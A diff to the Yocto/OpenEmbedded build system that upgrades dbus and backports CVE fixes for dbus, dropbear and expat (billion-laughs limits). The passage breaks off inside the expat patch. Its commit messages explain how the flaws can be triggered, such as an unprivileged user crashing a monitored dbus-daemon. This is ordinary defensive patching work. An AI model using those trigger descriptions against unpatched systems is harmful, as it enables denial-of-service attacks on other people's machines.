diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
1inherit autotools pkgconfig gettext upstream-version-is-even
2
3LICENSE = "AFL-2.1 | GPLv2+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
5 file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
6
7SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
8 file://tmpdir.patch \
9 file://dbus-1.init \
10 file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
11 file://CVE-2023-34969.patch \
12"
13
14SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
15
16EXTRA_OECONF = "--disable-xml-docs \
17 --disable-doxygen-docs \
18 --disable-libaudit \
19 --enable-largefile \
20 --with-system-socket=/run/dbus/system_bus_socket \
21 "
22EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
23EXTRA_OECONF_append_class-native = " --disable-selinux"
24
25PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
26 user-session \
27 "
28PACKAGECONFIG_class-native = ""
29PACKAGECONFIG_class-nativesdk = ""
30
31PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
32PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
33PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
34PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
35
36CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"
diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
1From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
2From: Simon McVittie <smcv@collabora.com>
3Date: Thu, 16 Apr 2020 14:45:11 +0100
4Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
5
6MSG_CTRUNC indicates that we have received fewer fds that we should
7have done because the buffer was too small, but we were treating it
8as though it indicated that we received *no* fds. If we received any,
9we still have to make sure we close them, otherwise they will be leaked.
10
11On the system bus, if an attacker can induce us to leak fds in this
12way, that's a local denial of service via resource exhaustion.
13
14Reported-by: Kevin Backhouse, GitHub Security Lab
15Fixes: dbus#294
16Fixes: CVE-2020-12049
17Fixes: GHSL-2020-057
18
19Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
20CVE: CVE-2020-12049
21Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
22---
23 dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
24 1 file changed, 20 insertions(+), 12 deletions(-)
25
26diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
27index b5fc2466..b176dae1 100644
28--- a/dbus/dbus-sysdeps-unix.c
29+++ b/dbus/dbus-sysdeps-unix.c
30@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
31 struct cmsghdr *cm;
32 dbus_bool_t found = FALSE;
33
34- if (m.msg_flags & MSG_CTRUNC)
35- {
36- /* Hmm, apparently the control data was truncated. The bad
37- thing is that we might have completely lost a couple of fds
38- without chance to recover them. Hence let's treat this as a
39- serious error. */
40-
41- errno = ENOSPC;
42- _dbus_string_set_length (buffer, start);
43- return -1;
44- }
45-
46 for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
47 if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
48 {
49@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
50 if (!found)
51 *n_fds = 0;
52
53+ if (m.msg_flags & MSG_CTRUNC)
54+ {
55+ unsigned int i;
56+
57+ /* Hmm, apparently the control data was truncated. The bad
58+ thing is that we might have completely lost a couple of fds
59+ without chance to recover them. Hence let's treat this as a
60+ serious error. */
61+
62+ /* We still need to close whatever fds we *did* receive,
63+ * otherwise they'll never get closed. (CVE-2020-12049) */
64+ for (i = 0; i < *n_fds; i++)
65+ close (fds[i]);
66+
67+ *n_fds = 0;
68+ errno = ENOSPC;
69+ _dbus_string_set_length (buffer, start);
70+ return -1;
71+ }
72+
73 /* put length back (doesn't actually realloc) */
74 _dbus_string_set_length (buffer, start + bytes_read);
75
76--
772.25.1
78
diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
1From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
2From: hongjinghao <q1204531485@163.com>
3Date: Mon, 5 Jun 2023 18:17:06 +0100
4Subject: [PATCH] bus: Assign a serial number for messages from the driver
5
6Normally, it's enough to rely on a message being given a serial number
7by the DBusConnection just before it is actually sent. However, in the
8rare case where the policy blocks the driver from sending a message
9(due to a deny rule or the outgoing message quota being full), we need
10to get a valid serial number sooner, so that we can copy it into the
11DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
12message sent to monitors. Otherwise, the dbus-daemon will crash with
13an assertion failure if at least one Monitoring client is attached,
14because zero is not a valid serial number to copy.
15
16This fixes a denial-of-service vulnerability: if a privileged user is
17monitoring the well-known system bus using a Monitoring client like
18dbus-monitor or `busctl monitor`, then an unprivileged user can cause
19denial-of-service by triggering this crash. A mitigation for this
20vulnerability is to avoid attaching Monitoring clients to the system
21bus when they are not needed. If there are no Monitoring clients, then
22the vulnerable code is not reached.
23
24Co-authored-by: Simon McVittie <smcv@collabora.com>
25Resolves: dbus/dbus#457
26(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
27---
28 bus/connection.c | 15 +++++++++++++++
29 dbus/dbus-connection-internal.h | 2 ++
30 dbus/dbus-connection.c | 11 ++++++++++-
31 3 files changed, 27 insertions(+), 1 deletion(-)
32
33diff --git a/bus/connection.c b/bus/connection.c
34index b3583433..215f0230 100644
35--- a/bus/connection.c
36+++ b/bus/connection.c
37@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
38 if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
39 return FALSE;
40
41+ /* Make sure the message has a non-zero serial number, otherwise
42+ * bus_transaction_capture_error_reply() will not be able to mock up
43+ * a corresponding reply for it. Normally this would be delayed until
44+ * the first time we actually send the message out from a
45+ * connection, when the transaction is committed, but that's too late
46+ * in this case.
47+ */
48+ if (dbus_message_get_serial (message) == 0)
49+ {
50+ dbus_uint32_t next_serial;
51+
52+ next_serial = _dbus_connection_get_next_client_serial (connection);
53+ dbus_message_set_serial (message, next_serial);
54+ }
55+
56 if (bus_connection_is_active (connection))
57 {
58 if (!dbus_message_set_destination (message,
59diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
60index 48357321..ba79b192 100644
61--- a/dbus/dbus-connection-internal.h
62+++ b/dbus/dbus-connection-internal.h
63@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
64 DBusConnection * _dbus_connection_ref_unlocked (DBusConnection *connection);
65 DBUS_PRIVATE_EXPORT
66 void _dbus_connection_unref_unlocked (DBusConnection *connection);
67+DBUS_PRIVATE_EXPORT
68+dbus_uint32_t _dbus_connection_get_next_client_serial (DBusConnection *connection);
69 void _dbus_connection_queue_received_message_link (DBusConnection *connection,
70 DBusList *link);
71 dbus_bool_t _dbus_connection_has_messages_to_send_unlocked (DBusConnection *connection);
72diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
73index c525b6dc..09cef278 100644
74--- a/dbus/dbus-connection.c
75+++ b/dbus/dbus-connection.c
76@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
77 _dbus_connection_last_unref (connection);
78 }
79
80-static dbus_uint32_t
81+/**
82+ * Allocate and return the next non-zero serial number for outgoing messages.
83+ *
84+ * This method is only valid to call from single-threaded code, such as
85+ * the dbus-daemon, or with the connection lock held.
86+ *
87+ * @param connection the connection
88+ * @returns A suitable serial number for the next message to be sent on the connection.
89+ */
90+dbus_uint32_t
91 _dbus_connection_get_next_client_serial (DBusConnection *connection)
92 {
93 dbus_uint32_t serial;
94--
952.25.1
96
diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
2DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed." 2DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
3HOMEPAGE = "https://dbus.freedesktop.org" 3HOMEPAGE = "https://dbus.freedesktop.org"
4SECTION = "base" 4SECTION = "base"
5LICENSE = "AFL-2.1 | GPLv2+" 5
6LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ 6require dbus.inc
7 file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" 7
8DEPENDS = "expat virtual/libintl autoconf-archive" 8DEPENDS = "expat virtual/libintl autoconf-archive"
9RDEPENDS_dbus_class-native = "" 9RDEPENDS_dbus_class-native = ""
10RDEPENDS_dbus_class-nativesdk = "" 10RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
12ALLOW_EMPTY_dbus-ptest = "1" 12ALLOW_EMPTY_dbus-ptest = "1"
13RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest" 13RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
14 14
15SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ 15inherit useradd update-rc.d
16 file://tmpdir.patch \
17 file://dbus-1.init \
18 file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
19 file://CVE-2020-12049.patch \
20"
21
22SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
23SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
24
25inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
26 16
27INITSCRIPT_NAME = "dbus-1" 17INITSCRIPT_NAME = "dbus-1"
28INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ." 18INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
93} 83}
94 84
95 85
96EXTRA_OECONF = "--disable-tests \ 86EXTRA_OECONF += "--disable-tests"
97 --disable-xml-docs \
98 --disable-doxygen-docs \
99 --disable-libaudit \
100 --enable-largefile \
101 --with-system-socket=/run/dbus/system_bus_socket \
102 "
103
104EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
105EXTRA_OECONF_append_class-native = " --disable-selinux"
106
107PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
108 user-session \
109 "
110
111PACKAGECONFIG_class-native = ""
112PACKAGECONFIG_class-nativesdk = ""
113
114PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
115PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
116PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
117 87
118do_install() { 88do_install() {
119 autotools_do_install 89 autotools_do_install
diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
1SUMMARY = "A lightweight SSH and SCP implementation" 1SUMMARY = "A lightweight SSH and SCP implementation"
2HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html" 2HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
3DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
3SECTION = "console/network" 4SECTION = "console/network"
4 5
5# some files are from other projects and have others license terms: 6# some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
11RPROVIDES_${PN} = "ssh sshd" 12RPROVIDES_${PN} = "ssh sshd"
12RCONFLICTS_${PN} = "openssh-sshd openssh" 13RCONFLICTS_${PN} = "openssh-sshd openssh"
13 14
15# break dependency on base package for -dev package
16# otherwise SDK fails to build as the main openssh and dropbear packages
17# conflict with each other
18RDEPENDS:${PN}-dev = ""
19
14DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}" 20DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
15 21
16SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \ 22SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
21 file://dropbear.socket \ 27 file://dropbear.socket \
22 file://dropbear.default \ 28 file://dropbear.default \
23 ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ 29 ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
24 ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} " 30 ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
31 file://CVE-2020-36254.patch \
32 file://CVE-2021-36369.patch \
33 "
25 34
26PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \ 35PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
27 file://0006-dropbear-configuration-file.patch \ 36 file://0006-dropbear-configuration-file.patch \
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
1From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
2From: Haelwenn Monnier <contact+github.com@hacktivis.me>
3Date: Mon, 25 May 2020 14:54:29 +0200
4Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
5
6Reference:
7https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
8
9CVE: CVE-2020-36254
10Upstream-Status: Backport
11
12---
13 scp.c | 3 ++-
14 1 file changed, 2 insertions(+), 1 deletion(-)
15
16diff --git a/scp.c b/scp.c
17index 742ae00..7b8e7d2 100644
18--- a/scp.c
19+++ b/scp.c
20@@ -935,7 +935,8 @@ sink(int argc, char **argv)
21 size = size * 10 + (*cp++ - '0');
22 if (*cp++ != ' ')
23 SCREWUP("size not delimited");
24- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
25+ if (*cp == '\0' || strchr(cp, '/') != NULL ||
26+ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
27 run_err("error: unexpected filename: %s", cp);
28 exit(1);
29 }
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
1From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
2From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
3Date: Thu, 19 Aug 2021 17:37:14 +0200
4Subject: [PATCH] added option to disable trivial auth methods (#128)
5
6* added option to disable trivial auth methods
7
8* rename argument to match with other ssh clients
9
10* fixed trivial auth detection for pubkeys
11
12[https://github.com/mkj/dropbear/pull/128]
13Upstream-Status: Backport
14CVE: CVE-2021-36369
15Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
16
17---
18 cli-auth.c | 3 +++
19 cli-authinteract.c | 1 +
20 cli-authpasswd.c | 2 +-
21 cli-authpubkey.c | 1 +
22 cli-runopts.c | 7 +++++++
23 cli-session.c | 1 +
24 runopts.h | 1 +
25 session.h | 1 +
26 8 files changed, 16 insertions(+), 1 deletion(-)
27
28diff --git a/cli-auth.c b/cli-auth.c
29index 2e509e5..6f04495 100644
30--- a/cli-auth.c
31+++ b/cli-auth.c
32@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
33 if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
34
35 TRACE(("received msg_userauth_success"))
36+ if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
37+ dropbear_exit("trivial authentication not allowed");
38+ }
39 /* Note: in delayed-zlib mode, setting authdone here
40 * will enable compression in the transport layer */
41 ses.authstate.authdone = 1;
42diff --git a/cli-authinteract.c b/cli-authinteract.c
43index e1cc9a1..f7128ee 100644
44--- a/cli-authinteract.c
45+++ b/cli-authinteract.c
46@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
47 m_free(instruction);
48
49 for (i = 0; i < num_prompts; i++) {
50+ cli_ses.is_trivial_auth = 0;
51 unsigned int response_len = 0;
52 prompt = buf_getstring(ses.payload, NULL);
53 cleantext(prompt);
54diff --git a/cli-authpasswd.c b/cli-authpasswd.c
55index 00fdd8b..a24d43e 100644
56--- a/cli-authpasswd.c
57+++ b/cli-authpasswd.c
58@@ -155,7 +155,7 @@ void cli_auth_password() {
59
60 encrypt_packet();
61 m_burn(password, strlen(password));
62-
63+ cli_ses.is_trivial_auth = 0;
64 TRACE(("leave cli_auth_password"))
65 }
66 #endif /* DROPBEAR_CLI_PASSWORD_AUTH */
67diff --git a/cli-authpubkey.c b/cli-authpubkey.c
68index 7cee164..7da1a04 100644
69--- a/cli-authpubkey.c
70+++ b/cli-authpubkey.c
71@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
72 buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
73 cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
74 buf_free(sigbuf); /* Nothing confidential in the buffer */
75+ cli_ses.is_trivial_auth = 0;
76 }
77
78 encrypt_packet();
79diff --git a/cli-runopts.c b/cli-runopts.c
80index 7d1fffe..6bf8b8e 100644
81--- a/cli-runopts.c
82+++ b/cli-runopts.c
83@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
84 #if DROPBEAR_CLI_ANYTCPFWD
85 cli_opts.exit_on_fwd_failure = 0;
86 #endif
87+ cli_opts.disable_trivial_auth = 0;
88 #if DROPBEAR_CLI_LOCALTCPFWD
89 cli_opts.localfwds = list_new();
90 opts.listen_fwd_all = 0;
91@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
92 #if DROPBEAR_CLI_ANYTCPFWD
93 "\tExitOnForwardFailure\n"
94 #endif
95+ "\tDisableTrivialAuth\n"
96 #ifndef DISABLE_SYSLOG
97 "\tUseSyslog\n"
98 #endif
99@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
100 return;
101 }
102
103+ if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
104+ cli_opts.disable_trivial_auth = parse_flag_value(optstr);
105+ return;
106+ }
107+
108 dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
109 }
110diff --git a/cli-session.c b/cli-session.c
111index 56dd4af..73ef0db 100644
112--- a/cli-session.c
113+++ b/cli-session.c
114@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
115 /* Auth */
116 cli_ses.lastprivkey = NULL;
117 cli_ses.lastauthtype = 0;
118+ cli_ses.is_trivial_auth = 1;
119
120 /* For printing "remote host closed" for the user */
121 ses.remoteclosed = cli_remoteclosed;
122diff --git a/runopts.h b/runopts.h
123index 31eae1f..8519626 100644
124--- a/runopts.h
125+++ b/runopts.h
126@@ -154,6 +154,7 @@ typedef struct cli_runopts {
127 #if DROPBEAR_CLI_ANYTCPFWD
128 int exit_on_fwd_failure;
129 #endif
130+ int disable_trivial_auth;
131 #if DROPBEAR_CLI_REMOTETCPFWD
132 m_list * remotefwds;
133 #endif
134diff --git a/session.h b/session.h
135index 0f77055..8676054 100644
136--- a/session.h
137+++ b/session.h
138@@ -287,6 +287,7 @@ struct clientsession {
139
140 int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
141 for the last type of auth we tried */
142+ int is_trivial_auth;
143 int ignore_next_auth_response;
144 #if DROPBEAR_CLI_INTERACT_AUTH
145 int auth_interact_failed; /* flag whether interactive auth can still
diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Embedded Linux Library" 1SUMMARY = "Embedded Linux Library"
2HOMEPAGE = "https://01.org/ell"
2DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \ 3DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
3low-level functionality for system daemons. It typically has no \ 4low-level functionality for system daemons. It typically has no \
4dependencies other than the Linux kernel, C standard library, and \ 5dependencies other than the Linux kernel, C standard library, and \
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
1From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Mon, 19 Apr 2021 21:42:51 +0200
4Subject: [PATCH] expat: Backport fix for CVE-2013-0340
5
6Issue: https://github.com/libexpat/libexpat/issues/34
7
8This patch cherry-picks the following commits from upstream release
92.4.0 onto 2.2.9:
10
11- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
12- 60959f2b491876199879d97c8ed956eabb0c2e73
13
14Upstream-Status: Backport
15CVE: CVE-2013-0340
16Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
17---
18 lib/expat.h | 21 +-
19 lib/internal.h | 30 +
20 lib/libexpat.def | 3 +
21 lib/libexpatw.def | 3 +
22 lib/xmlparse.c | 1147 +++++++++++++++++++++++++++++++++++++--
23 5 files changed, 1143 insertions(+), 61 deletions(-)
24
25diff --git a/lib/expat.h b/lib/expat.h
26index 48a6e2a3..0fb70d9d 100644
27--- a/lib/expat.h
28+++ b/lib/expat.h
29@@ -115,7 +115,9 @@ enum XML_Error {
30 XML_ERROR_RESERVED_PREFIX_XMLNS,
31 XML_ERROR_RESERVED_NAMESPACE_URI,
32 /* Added in 2.2.1. */
33- XML_ERROR_INVALID_ARGUMENT
34+ XML_ERROR_INVALID_ARGUMENT,
35+ /* Added in 2.4.0. */
36+ XML_ERROR_AMPLIFICATION_LIMIT_BREACH
37 };
38
39 enum XML_Content_Type {
40@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
41 XML_FEATURE_SIZEOF_XML_LCHAR,
42 XML_FEATURE_NS,
43 XML_FEATURE_LARGE_SIZE,
44- XML_FEATURE_ATTR_INFO
45+ XML_FEATURE_ATTR_INFO,
46+ /* Added in Expat 2.4.0. */
47+ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
48+ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
49 /* Additional features must be added to the end of this enum. */
50 };
51
52@@ -1010,6 +1015,18 @@ typedef struct {
53 XMLPARSEAPI(const XML_Feature *)
54 XML_GetFeatureList(void);
55
56+#ifdef XML_DTD
57+/* Added in Expat 2.4.0. */
58+XMLPARSEAPI(XML_Bool)
59+XML_SetBillionLaughsAttackProtectionMaximumAmplification(
60+ XML_Parser parser, float maximumAmplificationFactor);
61+
62+/* Added in Expat 2.4.0. */
63+XMLPARSEAPI(XML_Bool)
64+XML_SetBillionLaughsAttackProtectionActivationThreshold(
65+ XML_Parser parser, unsigned long long activationThresholdBytes);
66+#endif
67+
68 /* Expat follows the semantic versioning convention.
69 See http://semver.org.
70 */
71diff --git a/lib/internal.h b/lib/internal.h
72index 60913dab..d8b31fa2 100644
73--- a/lib/internal.h
74+++ b/lib/internal.h
75@@ -101,10 +101,40 @@
76 # endif
77 #endif
78
79+#include <limits.h> // ULONG_MAX
80+
81+#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
82+# define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
83+# if defined(_WIN64) // Note: modifier "td" does not work for MinGW
84+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
85+# else
86+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
87+# endif
88+#else
89+# define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
90+# if ! defined(ULONG_MAX)
91+# error Compiler did not define ULONG_MAX for us
92+# elif ULONG_MAX == 18446744073709551615u // 2^64-1
93+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
94+# else
95+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
96+# endif
97+#endif
98+
99 #ifndef UNUSED_P
100 # define UNUSED_P(p) (void)p
101 #endif
102
103+/* NOTE BEGIN If you ever patch these defaults to greater values
104+ for non-attack XML payload in your environment,
105+ please file a bug report with libexpat. Thank you!
106+*/
107+#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT \
108+ 100.0f
109+#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT \
110+ 8388608 // 8 MiB, 2^23
111+/* NOTE END */
112+
113 #ifdef __cplusplus
114 extern "C" {
115 #endif
116diff --git a/lib/libexpat.def b/lib/libexpat.def
117index 16faf595..5aefa6df 100644
118--- a/lib/libexpat.def
119+++ b/lib/libexpat.def
120@@ -76,3 +76,6 @@ EXPORTS
121 XML_SetHashSalt @67
122 ; added with version 2.2.5
123 _INTERNAL_trim_to_complete_utf8_characters @68
124+; added with version 2.4.0
125+ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
126+ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
127diff --git a/lib/libexpatw.def b/lib/libexpatw.def
128index 16faf595..5aefa6df 100644
129--- a/lib/libexpatw.def
130+++ b/lib/libexpatw.def
131@@ -76,3 +76,6 @@ EXPORTS
132 XML_SetHashSalt @67
133 ; added with version 2.2.5
134 _INTERNAL_trim_to_complete_utf8_characters @68
135+; added with version 2.4.0
136+ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
137+ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
138diff --git a/lib/xmlparse.c b/lib/xmlparse.c
139index 3aaf35b9..6790bc28 100644
140--- a/lib/xmlparse.c
141+++ b/lib/xmlparse.c
142@@ -47,6 +47,8 @@
143 #include <limits.h> /* UINT_MAX */
144 #include <stdio.h> /* fprintf */
145 #include <stdlib.h> /* getenv, rand_s */
146+#include <stdint.h> /* uintptr_t */
147+#include <math.h> /* isnan */
148
149 #ifdef _WIN32
150 # define getpid GetCurrentProcessId
151@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
152 XML_Bool betweenDecl; /* WFC: PE Between Declarations */
153 } OPEN_INTERNAL_ENTITY;
154
155+enum XML_Account {
156+ XML_ACCOUNT_DIRECT, /* bytes directly passed to the Expat parser */
